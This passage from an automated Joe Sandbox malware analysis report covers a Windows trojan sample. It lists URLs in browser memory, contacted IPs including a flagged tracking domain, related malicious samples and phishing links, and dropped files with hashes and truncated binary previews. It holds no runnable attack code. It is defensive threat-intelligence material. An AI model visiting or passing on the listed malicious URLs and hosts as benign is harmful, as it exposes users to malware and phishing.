https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions	chrome.exe, 0000000D.00000003.313262848.000033E000964000.00000004.00000800.00020000.00000000.sdmp	false		high
https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy	chrome.exe, 0000000D.00000003.313262848.000033E000964000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/spreadsheets/	chrome.exe, 0000000D.00000003.311139526.000033E0005E0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/dot2.gif	chrome.exe, 0000000D.00000003.402596542.000033E00140C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3078	chrome.exe, 0000000D.00000003.311106358.000033E00054C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.310908896.000033E000540000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://anglebug.com/5375	chrome.exe, 0000000D.00000003.311106358.000033E00054C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.310908896.000033E000540000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://anglebug.com/5371	chrome.exe, 0000000D.00000003.311106358.000033E00054C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.310908896.000033E000540000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://anglebug.com/4722	chrome.exe, 0000000D.00000003.311106358.000033E00054C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.310908896.000033E000540000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://lens.google.com/v2/b	chrome.exe, 0000000D.00000003.307093561.0000391A00330000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.318241007.0000391A00708000.00000004.00000800.00020000.00000000.sdmp	false		high
https://m.google.com/devicemanagement/data/api	chrome.exe, 0000000D.00000003.324562440.000033E000124000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.309254501.000033E00012C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore/detail/$	chrome.exe, 0000000D.00000003.341792635.000033E001124000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.341569795.000033E001714000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.341701466.000033E000834000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.341605187.000033E000594000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/presentation/u/0/create?usp=chrome_actions	chrome.exe, 0000000D.00000003.313262848.000033E000964000.00000004.00000800.00020000.00000000.sdmp	false		high
https://twitter.com/intent/tweet	chrome.exe, 0000000D.00000003.326987415.000033E00144C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://sandbox.google.com/	chrome.exe, 0000000D.00000003.404691125.000033E0005E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.404544296.000033E00194C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://myactivity.google.com/myactivity?utm_source=chrome_cbd	chrome.exe, 0000000D.00000003.329833961.000033E0016AC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/6692	chrome.exe, 0000000D.00000003.311106358.000033E00054C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.310908896.000033E000540000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://anglebug.com/3502	chrome.exe, 0000000D.00000003.311106358.000033E00054C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.310908896.000033E000540000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://anglebug.com/3623	chrome.exe, 0000000D.00000003.310908896.000033E000540000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.310978057.000033E0005C4000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://accounts.google.com/oauth/multilogin3	chrome.exe, 0000000D.00000003.324562440.000033E000124000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/cleardot.gif	chrome.exe, 0000000D.00000003.402596542.000033E00140C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3625	chrome.exe, 0000000D.00000003.310908896.000033E000540000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.310978057.000033E0005C4000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://anglebug.com/3624	chrome.exe, 0000000D.00000003.310908896.000033E000540000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.310978057.000033E0005C4000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://anglebug.com/5007	chrome.exe, 0000000D.00000003.311106358.000033E00054C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.310908896.000033E000540000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://drive.google.com/drive/installwebapp?usp=chrome_default	chrome.exe, 0000000D.00000003.311139526.000033E0005E0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstoreLDDiscover	chrome.exe, 0000000D.00000003.315744294.000033E000BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.385444418.000033E000908000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.404691125.000033E0005E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.346913562.000033E000908000.00000004.00000800.00020000.00000000.sdmp	false		high
https://payments.google.com/payments/v4/js/integrator.js?7https://sandbox.google.com/payments/v4/js/	chrome.exe, 0000000D.00000003.404691125.000033E0005E0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/presentation/B	chrome.exe, 0000000D.00000003.311139526.000033E0005E0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/4836	chrome.exe, 0000000D.00000003.311106358.000033E00054C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.310908896.000033E000540000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://issuetracker.google.com/issues/166475273	chrome.exe, 0000000D.00000003.310908896.000033E000540000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/presentation/:	chrome.exe, 0000000D.00000003.311139526.000033E0005E0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://accounts.google.com/MergeSession	chrome.exe, 0000000D.00000003.316432223.000033E000558000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.311106358.000033E000558000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.310908896.000033E000558000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.402596542.000033E00140C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/4384	chrome.exe, 0000000D.00000003.311106358.000033E00054C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.310908896.000033E000540000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.google.com/chrome/answer/111996?visit_id=637962485686793996-3320600880&p=update_erro	chrome.exe, 0000000D.00000003.312114970.000033E000884000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.328358661.000033E000884000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.341701466.000033E000884000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.381621013.000033E000884000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.google.com/chrome/answer/7570435	chrome.exe, 0000000D.00000003.327909466.000033E001590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.329833961.000033E0016AC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/intl/en_uk/chrome/	chrome.exe, 0000000D.00000003.315695802.000033E000C2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.329963204.000033E000BD7000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.328294400.000033E000C54000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3970	chrome.exe, 0000000D.00000003.311106358.000033E00054C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.310908896.000033E000540000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW	chrome.exe, 0000000D.00000003.313262848.000033E000964000.00000004.00000800.00020000.00000000.sdmp	false		high
http://polymer.github.io/CONTRIBUTORS.txt	chrome.exe, 0000000D.00000003.330039755.000033E001744000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.341792635.000033E001124000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.328358661.000033E000834000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.327954315.000033E00140C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.327996253.000033E0015C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.327198093.000033E001520000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.331113001.000033E00160C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.341569795.000033E001714000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.328294400.000033E000C2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.327824904.000033E0015B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.327198093.000033E0015B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.341701466.000033E000834000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.327885098.000033E001460000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.341486037.000033E00054C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.327772115.000033E000964000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.327198093.000033E001590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.327696668.000033E000E38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.328181687.000033E001464000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.328106665.000033E00054C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.326821565.000033E001520000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.331248964.000033E001750000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://sites.google.com/u/0/create?usp=chrome_actions	chrome.exe, 0000000D.00000003.313262848.000033E000964000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/intl/en-US/chrome/blank.html	chrome.exe, 0000000D.00000003.402462948.000033E00160C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://accounts.google.com/AddSession	chrome.exe, 0000000D.00000003.324562440.000033E000124000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.309306728.000033E000124000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/search?q=natural	chrome.exe, 0000000D.00000003.328294400.000033E000C54000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	chrome.exe, 0000000D.00000003.341605187.000033E0005C4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/search?q=mortgage	chrome.exe, 0000000D.00000003.328294400.000033E000C54000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/5901	chrome.exe, 0000000D.00000003.311106358.000033E00054C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.310908896.000033E000540000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://anglebug.com/3965	chrome.exe, 0000000D.00000003.311106358.000033E00054C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.310908896.000033E000540000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://anglebug.com/6439	chrome.exe, 0000000D.00000003.311106358.000033E00054C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.310908896.000033E000540000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://anglebug.com/7406	chrome.exe, 0000000D.00000003.311106358.000033E00054C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.310908896.000033E000540000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://chrome.google.com/webstore/detail/	chrome.exe, 0000000D.00000003.327198093.000033E001520000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.327198093.000033E0014E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.326821565.000033E0014CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.326821565.000033E001520000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.google.com/update2/response	chrome.exe, 0000000D.00000003.320579569.000033E001330000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/5906	chrome.exe, 0000000D.00000003.311106358.000033E00054C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.310908896.000033E000540000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://anglebug.com/2517	chrome.exe, 0000000D.00000003.311106358.000033E00054C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.310908896.000033E000540000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://anglebug.com/4937	chrome.exe, 0000000D.00000003.311106358.000033E00054C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.310908896.000033E000540000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://issuetracker.google.com/166809097	chrome.exe, 0000000D.00000003.310908896.000033E000540000.00000004.00000800.00020000.00000000.sdmp	false		high
http://issuetracker.google.com/200067929	chrome.exe, 0000000D.00000003.310908896.000033E000540000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.google.com/chrome/?p=ui_automatic_settings_reset	chrome.exe, 0000000D.00000003.327954315.000033E00140C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.327198093.000033E001520000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.327909466.000033E001590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.327198093.000033E0014E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.327885098.000033E00144C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.326821565.000033E001520000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.329833961.000033E0016AC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3153	chrome.exe, 0000000D.00000003.311106358.000033E00054C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.310908896.000033E000540000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://accounts.google.com/GetUserInfo	chrome.exe, 0000000D.00000003.316432223.000033E000558000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.311106358.000033E000558000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.310908896.000033E000558000.00000004.00000800.00020000.00000000.sdmp	false		high
http://goo.gl/Y1OdAq	chrome.exe, 0000000D.00000003.341605187.000033E000594000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive-thirdparty.googleusercontent.com/32/type/	chrome.exe, 0000000D.00000003.341605187.000033E000594000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.google.com/chrome?p=update_errorU	chrome.exe, 0000000D.00000003.316432223.000033E000558000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.341486037.000033E000558000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.328106665.000033E000558000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.326280772.000033E000558000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.google.com/chrome?p=cpn_cookies	chrome.exe, 0000000D.00000003.327954315.000033E00140C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.327198093.000033E001520000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.327909466.000033E001590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.327198093.000033E0014E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.327885098.000033E00144C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.326821565.000033E001520000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.327865184.000033E0005D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.329833961.000033E0016AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.326987415.000033E00144C000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.251.209.36	www.google.com	United States	15169	GOOGLEUS	false
142.250.184.46	clients.l.google.com	United States	15169	GOOGLEUS	false
95.141.32.211	grtrackingstorage.com	Italy	49367	ASSEFLOWAmsterdamInternetExchangeAMS-IXIT	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
142.250.180.173	accounts.google.com	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	785816
Start date and time:	2023-01-17 14:51:29 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 30s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	9nSv9py6hs.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	21
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@44/4@4/6
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 88.9% (good quality ratio 75.7%) Quality average: 51.5% Quality standard deviation: 30.8%
HCA Information:	Successful, ratio: 94% Number of executed functions: 33 Number of non-executed functions: 45
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240s for sample files taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.251.209.35, 34.104.35.123, 142.251.209.42, 216.58.209.42, 142.250.184.42, 142.250.184.74, 142.250.184.106, 142.250.180.138, 142.250.180.170, 142.251.209.10
Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, edgedl.me.gvt1.com, ctldl.windowsupdate.com, clientservices.googleapis.com, optimizationguide-pa.googleapis.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtWriteVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
14:52:38	API Interceptor	89x Sleep call for process: rundll32.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
95.141.32.211	file.exe	Get hash	malicious	Browse
239.255.255.250	https://border-fd.smartertechnologies.com/login	Get hash	malicious	Browse
	microsoft-edge_gXo7-D1.exe	Get hash	malicious	Browse
	https://bit.ly/3XhkLZm	Get hash	malicious	Browse
	microsoft-edge_gXo7-D1.exe	Get hash	malicious	Browse
	https://alzi3ka2-4twkfsnnqq-wl.a.run.app/	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	https://b24-8eoee1.bitrix24.site/crm_form_svxqs/	Get hash	malicious	Browse
	https://www.smore.com/8wb1j	Get hash	malicious	Browse
	https://ipfs.io/ipfs/QmdXFCUSynHMoUurDyNY2yfxYGXs5bKXXQWTEvXg8tXTkS?filename=Webmail.htm#u003ecihassuranceteam@homeoffice.gov.uk	Get hash	malicious	Browse
	https://wlbendvmwdm4v1pendvutuuzvujvr.populr.me/3653864370828	Get hash	malicious	Browse
	https://zvor5-6aaaa-aaaad-qeu7a-cai.raw.ic0.app/	Get hash	malicious	Browse
	microsoft-edge_gXo7-D1.exe	Get hash	malicious	Browse
	http://wlbendvmwdm4v1pendvutuuzvujvr.populr.me/3653864370828	Get hash	malicious	Browse
	microsoft-edge_gXo7-D1.exe	Get hash	malicious	Browse
	Meeting_Schedules.pdf......htm	Get hash	malicious	Browse
	Payment Confirmation EFT .shtml	Get hash	malicious	Browse
	https://v.ht/hE2nS	Get hash	malicious	Browse
	http://wlbendvmwdm4v1pendvutuuzvujvr.populr.me/3653864370828	Get hash	malicious	Browse
	https://bpjyeo7cfcccaqh5etkjsalqyng7mzhj27hwxreyo4oayn66ghsa.arweave.net/C9OCO-IohCBA_STUmQFww032ZOnXz2vEmHccDDfeMeQ/#markadsdeild@kvika.is	Get hash	malicious	Browse
	https://sosconsulta.co/deep/web.php?email=arion@arion.is	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
grtrackingstorage.com	file.exe	Get hash	malicious	Browse	95.141.32.211

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ASSEFLOWAmsterdamInternetExchangeAMS-IXIT	file.exe	Get hash	malicious	Browse	95.141.32.211
	upx9bnsbiZ.exe	Get hash	malicious	Browse	95.141.41.13
	file.exe	Get hash	malicious	Browse	95.141.41.13
	bdf7f13dca65ddcf112e9ff77f6ea6ca00c9dc23f5f60.exe	Get hash	malicious	Browse	95.141.41.13
	SecuriteInfo.com.MSIL.Small.CO.tr.25516.exe	Get hash	malicious	Browse	95.141.38.173
	skid.x86-20220815-1256	Get hash	malicious	Browse	92.114.92.39
	PO 3021.exe	Get hash	malicious	Browse	94.198.98.168
	dBG1JRHe8d.exe	Get hash	malicious	Browse	83.136.106.223
	KEie4St7Tt	Get hash	malicious	Browse	95.141.36.123
	uUxLhCncpZ	Get hash	malicious	Browse	95.141.36.123
	Linux_x86	Get hash	malicious	Browse	95.141.36.123
	O5xedhqPNj	Get hash	malicious	Browse	91.203.220.104
	BK0Zh4DEJU	Get hash	malicious	Browse	152.89.98.236
	mips-20211114-0109	Get hash	malicious	Browse	152.89.98.232
	invoice copy.pdf.exe	Get hash	malicious	Browse	89.40.227.58
	Proforma Invoice.pdf.exe	Get hash	malicious	Browse	89.40.227.58
	Proforma Invoice.pdf.exe	Get hash	malicious	Browse	89.40.227.58
	kecFPnbu5K.exe	Get hash	malicious	Browse	185.213.21.11
	LM6QUd7sMJ.exe	Get hash	malicious	Browse	158.58.173.238
	8nrLE6XA09	Get hash	malicious	Browse	152.89.3.156

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\Udtshesidi.tmp	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\9NSV9PY6HS.exe	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\9NSV9PY6HS.exe

Download File

Process:	C:\Users\user\Desktop\9nSv9py6hs.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1414144
Entropy (8bit):	7.916000775768196
Encrypted:	false
SSDEEP:	24576:3pMGNk8T1ifn+i9VLmxo6kLHnXOr1+PgVBCJPDCAEcw2ysp88WQMm:3/dimqVLmxkTnguhEcfysp88Ww
MD5:	358819C5567152065484C562A55074E4
SHA1:	49DE366DFA1217026DDC06B3B5EDA2D2664FCB87
SHA-256:	A58AAF48A55926929AD932C9C438851F212C1A6970F3DF39873EE1B6192CBE43
SHA-512:	A128179C912454F793441382D5307BB96B291E28985FC338FBC22FE22C848D55A539731A1F73900A57D1362585BA653F9429DCD58DFA56E0BEF5B5057AA3E02E
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9..R}...}...}.......\|...c...f...c.......Z=..z...}.......c...^...c...\|...c...\|...Rich}...........................PE..L...W.La.................V...........].......p....@.................................(........................................Z..P....0..`............................................................B..@............................................text....U.......V.................. ..`.data...H....p...`...Z..............@....rsrc...`....0......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Udtshesidi.tmp

Download File

Process:	C:\Users\user\Desktop\9nSv9py6hs.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	828416
Entropy (8bit):	6.805227879369454
Encrypted:	false
SSDEEP:	24576:6zaW1Juh5axss/b1n351P0aDputCjhv1iibHGBUI:6u3h0N3XJF6
MD5:	921C92414F00481BEEB6AC21072819EC
SHA1:	D5AC8ECBA47C6ACAEC7C5771FECBBA2CC75CDDFF
SHA-256:	1AB1E8894341A241C037FF50C3DEE1AC656F9F82508116DF723A7B8F6188486A
SHA-512:	5CA39448FB557D6FA2260DDB96C9DE354D271A0DC9A8C1601196B252DDCD0B2452DCEB79B114F1AA5E774C2F68F005C382B674991C3077D00965DB4EEE0496CB
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 58%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e:..![.@![.@![.@.,.A&[.@.,.A [.@L..A"[.@![.@5[.@.D.@([.@...A [.@...A [.@...A [.@Rich![.@................PE..L....E.c...........!.................B....................................................@.............................@.......<............................@...}......................................................@............................text...P........................... ..`.rdata..............................@..@.data............0..................@....reloc...}...@...~...&..............@..B........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp0CBB.tmp

Download File

Process:	C:\Windows\System32\notepad.exe
File Type:	OpenPGP Public Key
Category:	modified
Size (bytes):	1414144
Entropy (8bit):	7.999873213109941
Encrypted:	true
SSDEEP:	24576:n5AtLg0D8gZCV4ujvIKApGCgif0xSqjKNHTQM/ZoVU14Dr/cw7u52BiiwFOUJRTy:yfD85gShSHto61Gr/J7u6irFVjFwz
MD5:	81EE3AB326A86B800D94472FD3060950
SHA1:	90B4DF1E6A3AB9F4C2F7223718D48AB7F450DE45
SHA-256:	B803AF23FBEB59851262169A7B60FF7AE35D1EA861989C65B349C2AD999F4551
SHA-512:	937E9899F8CCD9292C6C2DCB9847093F63406B6CDC773D2839B0471DCA113BF2AB0FDDC559257641440FF86CA6D004AE23097419376C1DA6B542E65398AD31BC
Malicious:	false
Preview:	...o=h.3.....N.gk....8..._L.:HDk...(...4j$.yC.l...ze.......LS..f..p.@51..n...Y..X. .(0A..Lb.<Bv.....Qkr7MF.{P&>...A.$...).....~...<.. %..p.$..^.....?-.nLQ."tz8.f....)..@U ?..V.Z.....l`ht.`..v~e.b..f.....m..y......4.....).../c...I.Ay.b..7..;dw4.1.".Af.].1.vG.+.Z......8.i..<0O^..K.T..u:..G......._.."l.........k...g..w6..fu............,...Y...h.H.#.y..u{S..B..=.c%..+..AqM%..`..q,..r2.Q..9t.6.Q..Q.(g.......X.u...v&..5...K.H..<H...1......Qq.=.S.L@(s..3.8..!CW;.lk.......1....x..\|e...0Ax-V...$@\^6.I.4.....,..5..{6@.f..4P...f.AJ...qX.3Sbz..O .@O5(JZ.m....x...\|....0..+..o6.....f<O...m.....Y.I.")..M.55...;..m...9...7.,)....Y0'....\...o....p......e.L"8....W..J.y.P.7....Mv....H[>..X.]..\.vX.K3X.[.. @-..z#....eB..0I.\|.d......Qxl...\|U.k.f.cC.....:9._<!.;vaT........D@..l.Y......."_D.om..m.Y.o..v".M.@.@..&.\+_7...N$.q~...>..a......;5u...2..Ft3d.l.4.....c~,..E.z.v<....Z...y.$..&.v1..P..!.U.[.-an.)a...c.B..(8Z..e@.*PJ....p.1...W...y.oC_M....Z@......tObM

tmp0CBB.tmp (copy)

